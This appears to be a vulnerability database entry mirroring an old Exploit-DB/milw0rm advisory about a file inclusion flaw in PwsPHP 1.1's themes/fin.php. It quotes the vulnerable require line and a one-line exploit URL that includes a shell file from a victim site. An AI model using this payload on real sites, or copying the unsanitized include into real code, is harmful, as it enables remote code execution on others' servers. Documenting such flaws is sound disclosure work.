PwsPHP v1.1 (theme) File inclusion Vulnerability

vendor:

PwsPHP

by:

Dr Max Virus

8,8

CVSS

HIGH

File Inclusion Vulnerability

CWE

Product Name: PwsPHP

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:pwsphp:pwsphp:1.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

PwsPHP v1.1 (theme) File inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'theme' parameter to '/themes/fin.php' script. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

==========================================================================================================================
PwsPHP v1.1 (theme) File inclusion Vulnerablity
===============================================
Script:PwsPHP
=============
Version:1.1
=============
script site:http://www.pwsphp.com
=================================
Author:Dr Max Virus
=======================================
Bug in;
themes/fin.php
==============
Vul Code:
require ("$theme/fin.php")
==========================
Exploit:
www.victim.com/script_path/themes/fin.php?themes=shell.txt?
===========================================================
Gr33Ts:str0ke-the master-Thehacker-NETTOXIC-ShiKAa-xoron-0xygen-All Ayyildiz
Team-All My Friends
================================================================================================
http://www.comscripts.com/scripts/php.pwsphp.1517.html
================================================================================================

# milw0rm.com [2006-10-31]